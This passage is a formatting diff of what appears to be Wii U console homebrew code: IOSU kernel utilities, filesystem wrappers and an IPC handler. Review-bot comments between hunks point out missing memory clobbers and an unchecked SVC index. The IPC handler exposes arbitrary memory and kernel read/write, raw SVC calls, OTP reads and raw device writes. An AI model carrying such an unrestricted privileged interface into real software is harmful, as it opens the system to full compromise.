dst) + size; + unsigned int endDst = ((unsigned int) dst) + size; unsigned int endRest = endDst & 3; if (endRest) { diff --git a/source/ios_kernel/source/utils.h b/source/ios_kernel/source/utils.h index 6a83e9d..d905625 100644 --- a/source/ios_kernel/source/utils.h +++ b/source/ios_kernel/source/utils.h 
@@ -24,30 +24,37 @@ #ifndef _UTILS_H #define _UTILS_H -#define ALIGN4(x) (((x) + 3) & ~3) +#define ALIGN4(x) (((x) + 3) & ~3) -#define kernel_memcpy ((void * (*)(void*, const void*, int))0x08131D04) -#define kernel_memset ((void *(*)(void*, int, unsigned int))0x08131DA0) -#define kernel_strncpy ((char *(*)(char*, const char*, unsigned int))0x081329B8) -#define disable_interrupts ((int(*)())0x0812E778) -#define enable_interrupts ((int(*)(int))0x0812E78C) -#define kernel_bsp_command_5 ((int (*)(const char*, int offset, const char*, int size, void *buffer))0x0812EC40) +#define kernel_memcpy ((void *(*) (void *, const void *, int) ) 0x08131D04) +#define kernel_memset ((void *(*) (void *, int, unsigned int) ) 0x08131DA0) +#define kernel_strncpy ((char *(*) (char *, const char *, unsigned int) ) 0x081329B8) +#define disable_interrupts ((int (*)()) 0x0812E778) +#define enable_interrupts ((int (*)(int)) 0x0812E78C) +#define kernel_bsp_command_5 ((int (*)(const char *, int offset, const char *, int size, void *buffer)) 0x0812EC40) void reverse_memcpy(void *dest, const void *src, unsigned int size); static inline unsigned int disable_mmu(void) { unsigned int control_register = 0; - asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register)); - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA)); + asm volatile("MRC p15, 0, %0, c1, c0, 0" + : "=r"(control_register)); + asm volatile("MCR p15, 0, %0, c1, c0, 0" + : + : "r"(control_register & 0xFFFFEFFA)); return control_register; } static inline void restore_mmu(unsigned int control_register) { - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register)); + asm volatile("MCR p15, 0, %0, c1, c0, 0" + : + : "r"(control_register)); } static inline void set_domain_register(unsigned int domain_register) { - asm volatile("MCR p15, 0, %0, c3, c0, 0" : : "r" (domain_register)); + asm volatile("MCR p15, 0, %0, c3, c0, 0" + : + : "r"(domain_register)); } #endif 
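Review bot: The reflowed `MCR` statements in `disable_mmu`, `restore_mmu` and `set_domain_register` carry no `"memory"` clobber, so the compiler is free to move ordinary loads and stores across the MMU-control and domain-register writes; `asm volatile` only keeps the asm from being dropped or reordered against other volatile asm. Callers such as `kernel_launch_ios` and `kernel_syscall_0x81` perform plain memory accesses immediately after these calls, which is exactly the case the clobber exists for. Adding it to all three statements, e.g. `: "r"(control_register & 0xFFFFEFFA) : "memory"`, pins the surrounding accesses to their source order.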
diff --git a/source/ios_mcp/source/fsa.c b/source/ios_mcp/source/fsa.c index 3cde0ab..8d756df 100644 --- a/source/ios_mcp/source/fsa.c +++ b/source/ios_mcp/source/fsa.c @@ -1,9 +1,9 @@ -#include -#include -#include -#include "svc.h" -#include "imports.h" #include "fsa.h" +#include "imports.h" +#include "svc.h" +#include +#include +#include static void *allocIobuf() { void *ptr = svcAlloc(0xCAFF, 0x828); @@ -18,12 +18,12 @@ static void freeIobuf(void *ptr) { } int FSA_Mount(int fd, char *device_path, char *volume_path, u32 flags, char *arg_string, int arg_string_len) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; strncpy((char *) &inbuf8[0x04], device_path, 0x27F); strncpy((char *) &inbuf8[0x284], volume_path, 0x27F); @@ -44,8 +44,8 @@ int FSA_Mount(int fd, char *device_path, char *volume_path, u32 flags, char *arg } int FSA_Unmount(int fd, char *path, u32 flags) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -58,8 +58,8 @@ int FSA_Unmount(int fd, char *path, u32 flags) { } int FSA_FlushVolume(int fd, char *volume_path) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], volume_path, 0x27F); 
@@ -71,8 +71,8 @@ int FSA_FlushVolume(int fd, char *volume_path) { } int FSA_MakeDir(int fd, char *path, u32 flags) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -85,8 +85,8 @@ int FSA_MakeDir(int fd, char *path, u32 flags) { } int FSA_OpenDir(int fd, char *path, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -100,8 +100,8 @@ int FSA_OpenDir(int fd, char *path, int *outHandle) { } int FSA_ReadDir(int fd, int handle, directoryEntry_s *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -115,8 +115,8 @@ int FSA_ReadDir(int fd, int handle, directoryEntry_s *out_data) { } int FSA_RewindDir(int fd, int handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -128,8 +128,8 @@ int FSA_RewindDir(int fd, int handle) { } int FSA_CloseDir(int fd, int handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -141,8 +141,8 @@ int FSA_CloseDir(int fd, int handle) { } int FSA_ChangeDir(int fd, char *path) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); 
@@ -154,8 +154,8 @@ int FSA_ChangeDir(int fd, char *path) { } int FSA_OpenFile(int fd, char *path, char *mode, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -170,12 +170,12 @@ int FSA_OpenFile(int fd, char *path, char *mode, int *outHandle) { } int _FSA_ReadWriteFile(int fd, void *data, u32 size, u32 cnt, int fileHandle, u32 flags, bool read) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; inbuf[0x08 / 4] = size; inbuf[0x0C / 4] = cnt; @@ -193,7 +193,8 @@ int _FSA_ReadWriteFile(int fd, void *data, u32 size, u32 cnt, int fileHandle, u3 int ret; if (read) ret = svcIoctlv(fd, 0x0F, 1, 2, iovec); - else ret = svcIoctlv(fd, 0x10, 2, 1, iovec); + else + ret = svcIoctlv(fd, 0x10, 2, 1, iovec); freeIobuf(iobuf); return ret; @@ -208,8 +209,8 @@ int FSA_WriteFile(int fd, void *data, u32 size, u32 cnt, int fileHandle, u32 fla } int FSA_StatFile(int fd, int handle, fileStat_s *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = handle; @@ -223,8 +224,8 @@ int FSA_StatFile(int fd, int handle, fileStat_s *out_data) { } int FSA_CloseFile(int fd, int fileHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = fileHandle; 
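Review bot: In `_FSA_ReadWriteFile` the formatter left the two branches of one statement in different shapes, `if (read) ret = svcIoctlv(fd, 0x0F, 1, 2, iovec);` on a single line and `else` broken across two, which reads like an unbraced dangling else at a glance. A single conditional expression, `int ret = read ? svcIoctlv(fd, 0x0F, 1, 2, iovec) : svcIoctlv(fd, 0x10, 2, 1, iovec);`, or braces on both branches, would read uniformly and survive future reformatting. The rest of that function's body is outside the hunk.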
@@ -236,8 +237,8 @@ int FSA_CloseFile(int fd, int fileHandle) { } int FSA_SetPosFile(int fd, int fileHandle, u32 position) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = fileHandle; @@ -250,8 +251,8 @@ int FSA_SetPosFile(int fd, int fileHandle, u32 position) { } int FSA_GetStat(int fd, char *path, fileStat_s *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -266,8 +267,8 @@ int FSA_GetStat(int fd, char *path, fileStat_s *out_data) { } int FSA_Remove(int fd, char *path) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -279,8 +280,8 @@ int FSA_Remove(int fd, char *path) { } int FSA_ChangeMode(int fd, char *path, int mode) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], path, 0x27F); @@ -297,8 +298,8 @@ int FSA_ChangeMode(int fd, char *path, int mode) { // 0x08 : device size in sectors (u64) // 0x10 : device sector size (u32) int FSA_GetDeviceInfo(int fd, char *device_path, int type, u32 *out_data) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], device_path, 0x27F); 
@@ -339,8 +340,8 @@ int FSA_GetDeviceInfo(int fd, char *device_path, int type, u32 *out_data) { } int FSA_RawOpen(int fd, char *device_path, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; strncpy((char *) &inbuf[0x01], device_path, 0x27F); @@ -354,8 +355,8 @@ int FSA_RawOpen(int fd, char *device_path, int *outHandle) { } int FSA_RawClose(int fd, int device_handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = device_handle; @@ -368,12 +369,12 @@ int FSA_RawClose(int fd, int device_handle) { // offset in blocks of 0x1000 bytes int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; // note : offset_bytes = blocks_offset * size_bytes inbuf[0x08 / 4] = (blocks_offset >> 32); @@ -398,12 +399,12 @@ int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, } int FSA_RawWrite(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; inbuf[0x08 / 4] = (blocks_offset >> 32); inbuf[0x0C / 4] = (blocks_offset & 0xFFFFFFFF); 
diff --git a/source/ios_mcp/source/fsa.h b/source/ios_mcp/source/fsa.h index b464546..d356071 100644 --- a/source/ios_mcp/source/fsa.h +++ b/source/ios_mcp/source/fsa.h @@ -1,12 +1,14 @@ #ifndef FSA_H #define FSA_H +#include "types.h" + typedef struct { u32 flag; u32 permission; u32 owner_id; u32 group_id; - u32 size; // size in bytes + u32 size; // size in bytes u32 physsize; // physical size on disk in bytes u32 unk[3]; u32 id; @@ -20,10 +22,10 @@ typedef struct { char name[0x100]; } directoryEntry_s; -#define DIR_ENTRY_IS_DIRECTORY 0x80000000 +#define DIR_ENTRY_IS_DIRECTORY 0x80000000 #define FSA_MOUNTFLAGS_BINDMOUNT (1 << 0) -#define FSA_MOUNTFLAGS_GLOBAL (1 << 1) +#define FSA_MOUNTFLAGS_GLOBAL (1 << 1) int FSA_Open(); diff --git a/source/ios_mcp/source/imports.h b/source/ios_mcp/source/imports.h index 72ee497..d110b37 100644 --- a/source/ios_mcp/source/imports.h +++ b/source/ios_mcp/source/imports.h @@ -1,11 +1,11 @@ #ifndef IMPORTS_H #define IMPORTS_H -#include -#include #include "types.h" +#include +#include -#define MCP_SVC_BASE ((void*)0x050567EC) +#define MCP_SVC_BASE ((void *) 0x050567EC) void usleep(u32 time); diff --git a/source/ios_mcp/source/ipc.c b/source/ios_mcp/source/ipc.c index 8dd4e83..0a44d65 100644 --- a/source/ios_mcp/source/ipc.c +++ b/source/ios_mcp/source/ipc.c 
@@ -21,59 +21,58 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include -#include -#include -#include "imports.h" -#include "fsa.h" -#include "svc.h" -#include "logger.h" -#include "fsa.h" -#include "wupserver.h" #include "../../common/kernel_commands.h" +#include "fsa.h" +#include "imports.h" +#include "logger.h" +#include "svc.h" +#include "wupserver.h" +#include +#include +#include -#define IOS_ERROR_UNKNOWN_VALUE 0xFFFFFFD6 -#define IOS_ERROR_INVALID_ARG 0xFFFFFFE3 -#define IOS_ERROR_INVALID_SIZE 0xFFFFFFE9 -#define IOS_ERROR_UNKNOWN 0xFFFFFFF7 -#define IOS_ERROR_NOEXISTS 0xFFFFFFFA +#define IOS_ERROR_UNKNOWN_VALUE 0xFFFFFFD6 +#define IOS_ERROR_INVALID_ARG 0xFFFFFFE3 +#define IOS_ERROR_INVALID_SIZE 0xFFFFFFE9 +#define IOS_ERROR_UNKNOWN 0xFFFFFFF7 +#define IOS_ERROR_NOEXISTS 0xFFFFFFFA -#define IOCTL_MEM_WRITE 0x00 -#define IOCTL_MEM_READ 0x01 -#define IOCTL_SVC 0x02 -#define IOCTL_KILL_SERVER 0x03 -#define IOCTL_MEMCPY 0x04 -#define IOCTL_REPEATED_WRITE 0x05 -#define IOCTL_KERN_READ32 0x06 -#define IOCTL_KERN_WRITE32 0x07 -#define IOCTL_READ_OTP 0x08 +#define IOCTL_MEM_WRITE 0x00 +#define IOCTL_MEM_READ 0x01 +#define IOCTL_SVC 0x02 +#define IOCTL_KILL_SERVER 0x03 +#define IOCTL_MEMCPY 0x04 +#define IOCTL_REPEATED_WRITE 0x05 +#define IOCTL_KERN_READ32 0x06 +#define IOCTL_KERN_WRITE32 0x07 +#define IOCTL_READ_OTP 0x08 -#define IOCTL_FSA_OPEN 0x40 -#define IOCTL_FSA_CLOSE 0x41 -#define IOCTL_FSA_MOUNT 0x42 -#define IOCTL_FSA_UNMOUNT 0x43 -#define IOCTL_FSA_GETDEVICEINFO 0x44 -#define IOCTL_FSA_OPENDIR 0x45 -#define IOCTL_FSA_READDIR 0x46 -#define IOCTL_FSA_CLOSEDIR 0x47 -#define IOCTL_FSA_MAKEDIR 0x48 -#define IOCTL_FSA_OPENFILE 0x49 -#define IOCTL_FSA_READFILE 0x4A -#define IOCTL_FSA_WRITEFILE 0x4B -#define IOCTL_FSA_STATFILE 0x4C -#define IOCTL_FSA_CLOSEFILE 0x4D -#define IOCTL_FSA_SETFILEPOS 0x4E -#define IOCTL_FSA_GETSTAT 0x4F -#define 
IOCTL_FSA_REMOVE 0x50 -#define IOCTL_FSA_REWINDDIR 0x51 -#define IOCTL_FSA_CHDIR 0x52 -#define IOCTL_FSA_RENAME 0x53 -#define IOCTL_FSA_RAW_OPEN 0x54 -#define IOCTL_FSA_RAW_READ 0x55 -#define IOCTL_FSA_RAW_WRITE 0x56 -#define IOCTL_FSA_RAW_CLOSE 0x57 -#define IOCTL_FSA_CHANGEMODE 0x58 -#define IOCTL_FSA_FLUSHVOLUME 0x59 +#define IOCTL_FSA_OPEN 0x40 +#define IOCTL_FSA_CLOSE 0x41 +#define IOCTL_FSA_MOUNT 0x42 +#define IOCTL_FSA_UNMOUNT 0x43 +#define IOCTL_FSA_GETDEVICEINFO 0x44 +#define IOCTL_FSA_OPENDIR 0x45 +#define IOCTL_FSA_READDIR 0x46 +#define IOCTL_FSA_CLOSEDIR 0x47 +#define IOCTL_FSA_MAKEDIR 0x48 +#define IOCTL_FSA_OPENFILE 0x49 +#define IOCTL_FSA_READFILE 0x4A +#define IOCTL_FSA_WRITEFILE 0x4B +#define IOCTL_FSA_STATFILE 0x4C +#define IOCTL_FSA_CLOSEFILE 0x4D +#define IOCTL_FSA_SETFILEPOS 0x4E +#define IOCTL_FSA_GETSTAT 0x4F +#define IOCTL_FSA_REMOVE 0x50 +#define IOCTL_FSA_REWINDDIR 0x51 +#define IOCTL_FSA_CHDIR 0x52 +#define IOCTL_FSA_RENAME 0x53 +#define IOCTL_FSA_RAW_OPEN 0x54 +#define IOCTL_FSA_RAW_READ 0x55 +#define IOCTL_FSA_RAW_WRITE 0x56 +#define IOCTL_FSA_RAW_CLOSE 0x57 +#define IOCTL_FSA_CHANGEMODE 0x58 +#define IOCTL_FSA_FLUSHVOLUME 0x59 static int ipcNodeKilled; static u8 threadStack[0x1000] __attribute__((aligned(0x20))); @@ -102,7 +101,7 @@ static int ipc_ioctl(ipcmessage *message) { if ((message->ioctl.length_in < 4) || (message->ioctl.length_io < 4)) { res = IOS_ERROR_INVALID_SIZE; } else { - int svc_id = message->ioctl.buffer_in[0]; + int svc_id = message->ioctl.buffer_in[0]; int size_arguments = message->ioctl.length_in - 4; u32 arguments[8]; 
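Review bot: In the `IOCTL_SVC` case, `u32 arguments[8];` is declared uninitialised while the `memcpy` in the following hunk copies at most `size_arguments` bytes, so whenever `length_in - 4` is below 32 the trailing entries passed to the SVC call are indeterminate stack contents; `u32 arguments[8] = {0};` makes the padding deterministic. `svc_id` is likewise taken straight from `buffer_in[0]` and used to form `MCP_SVC_BASE + svc_id * 8` with no range check, so a bound against the entry count of that table (not visible here) would be a reasonable guard before the call. The enclosing `ipc_ioctl` starts and ends outside this hunk.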
@@ -110,8 +109,8 @@ static int ipc_ioctl(ipcmessage *message) {
 memcpy(arguments, message->ioctl.buffer_in + 1, (size_arguments < 8 * 4) ? size_arguments : (8 * 4));
 // return error code as data
- message->ioctl.buffer_io[0] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32)) (MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4],
- arguments[5], arguments[6], arguments[7]);
+ message->ioctl.buffer_io[0] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32))(MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4],
+ arguments[5], arguments[6], arguments[7]);
 }
 break;
 }
@@ -132,10 +131,10 @@ static int ipc_ioctl(ipcmessage *message) {
 if (message->ioctl.length_in < 12) {
 res = IOS_ERROR_INVALID_SIZE;
 } else {
- u32 *dst = (u32 *) message->ioctl.buffer_in[0];
+ u32 *dst = (u32 *) message->ioctl.buffer_in[0];
 u32 *cache_range = (u32 *) (message->ioctl.buffer_in[0] & ~0xFF);
- u32 value = message->ioctl.buffer_in[1];
- u32 n = message->ioctl.buffer_in[2];
+ u32 value = message->ioctl.buffer_in[1];
+ u32 n = message->ioctl.buffer_in[2];
 u32 old = *dst;
 int i;
@@ -190,68 +189,68 @@ static int ipc_ioctl(ipcmessage *message) {
 break;
 }
 case IOCTL_FSA_CLOSE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 message->ioctl.buffer_io[0] = svcClose(fd);
 break;
 }
 case IOCTL_FSA_MOUNT: {
- int fd = message->ioctl.buffer_in[0];
- char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
- char *volume_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[2];
- u32 flags = message->ioctl.buffer_in[3];
- char *arg_string = (message->ioctl.buffer_in[4] > 0) ? (((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[4]) : 0;
+ int fd = message->ioctl.buffer_in[0];
+ char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
+ char *volume_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[2];
+ u32 flags = message->ioctl.buffer_in[3];
+ char *arg_string = (message->ioctl.buffer_in[4] > 0) ? (((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[4]) : 0;
 int arg_string_len = message->ioctl.buffer_in[5];
 message->ioctl.buffer_io[0] = FSA_Mount(fd, device_path, volume_path, flags, arg_string, arg_string_len);
 break;
 }
 case IOCTL_FSA_UNMOUNT: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
- u32 flags = message->ioctl.buffer_in[2];
+ u32 flags = message->ioctl.buffer_in[2];
 message->ioctl.buffer_io[0] = FSA_Unmount(fd, device_path, flags);
 break;
 }
 case IOCTL_FSA_GETDEVICEINFO: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *device_path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
- int type = message->ioctl.buffer_in[2];
+ int type = message->ioctl.buffer_in[2];
 message->ioctl.buffer_io[0] = FSA_GetDeviceInfo(fd, device_path, type, message->ioctl.buffer_io + 1);
 break;
 }
 case IOCTL_FSA_OPENDIR: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_OpenDir(fd, path, (int *) message->ioctl.buffer_io + 1);
 break;
 }
 case IOCTL_FSA_READDIR: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int handle = message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_ReadDir(fd, handle, (directoryEntry_s *) (message->ioctl.buffer_io + 1));
 break;
 }
 case IOCTL_FSA_CLOSEDIR: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int handle = message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_CloseDir(fd, handle);
 break;
 }
 case IOCTL_FSA_MAKEDIR: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
- u32 flags = message->ioctl.buffer_in[2];
+ u32 flags = message->ioctl.buffer_in[2];
 message->ioctl.buffer_io[0] = FSA_MakeDir(fd, path, flags);
 break;
 }
 case IOCTL_FSA_OPENFILE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 char *mode = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[2];
@@ -259,119 +258,119 @@ static int ipc_ioctl(ipcmessage *message) {
 break;
 }
 case IOCTL_FSA_READFILE: {
- int fd = message->ioctl.buffer_in[0];
- u32 size = message->ioctl.buffer_in[1];
- u32 cnt = message->ioctl.buffer_in[2];
+ int fd = message->ioctl.buffer_in[0];
+ u32 size = message->ioctl.buffer_in[1];
+ u32 cnt = message->ioctl.buffer_in[2];
 int fileHandle = message->ioctl.buffer_in[3];
- u32 flags = message->ioctl.buffer_in[4];
+ u32 flags = message->ioctl.buffer_in[4];
 message->ioctl.buffer_io[0] = FSA_ReadFile(fd, ((u8 *) message->ioctl.buffer_io) + 0x40, size, cnt, fileHandle, flags);
 break;
 }
 case IOCTL_FSA_WRITEFILE: {
- int fd = message->ioctl.buffer_in[0];
- u32 size = message->ioctl.buffer_in[1];
- u32 cnt = message->ioctl.buffer_in[2];
+ int fd = message->ioctl.buffer_in[0];
+ u32 size = message->ioctl.buffer_in[1];
+ u32 cnt = message->ioctl.buffer_in[2];
 int fileHandle = message->ioctl.buffer_in[3];
- u32 flags = message->ioctl.buffer_in[4];
+ u32 flags = message->ioctl.buffer_in[4];
 message->ioctl.buffer_io[0] = FSA_WriteFile(fd, ((u8 *) message->ioctl.buffer_in) + 0x40, size, cnt, fileHandle, flags);
 break;
 }
 case IOCTL_FSA_STATFILE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int fileHandle = message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_StatFile(fd, fileHandle, (fileStat_s *) (message->ioctl.buffer_io + 1));
 break;
 }
 case IOCTL_FSA_CLOSEFILE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int fileHandle = message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_CloseFile(fd, fileHandle);
 break;
 }
 case IOCTL_FSA_SETFILEPOS: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int fileHandle = message->ioctl.buffer_in[1];
- u32 position = message->ioctl.buffer_in[2];
+ u32 position = message->ioctl.buffer_in[2];
 message->ioctl.buffer_io[0] = FSA_SetPosFile(fd, fileHandle, position);
 break;
 }
 case IOCTL_FSA_GETSTAT: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_GetStat(fd, path, (fileStat_s *) (message->ioctl.buffer_io + 1));
 break;
 }
 case IOCTL_FSA_REMOVE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_Remove(fd, path);
 break;
 }
 case IOCTL_FSA_REWINDDIR: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int dirFd = message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_RewindDir(fd, dirFd);
 break;
 }
 case IOCTL_FSA_CHDIR: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_ChangeDir(fd, path);
 break;
 }
 case IOCTL_FSA_RAW_OPEN: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_RawOpen(fd, path, (int *) (message->ioctl.buffer_io + 1));
 break;
 }
 case IOCTL_FSA_RAW_READ: {
- int fd = message->ioctl.buffer_in[0];
- u32 block_size = message->ioctl.buffer_in[1];
- u32 cnt = message->ioctl.buffer_in[2];
+ int fd = message->ioctl.buffer_in[0];
+ u32 block_size = message->ioctl.buffer_in[1];
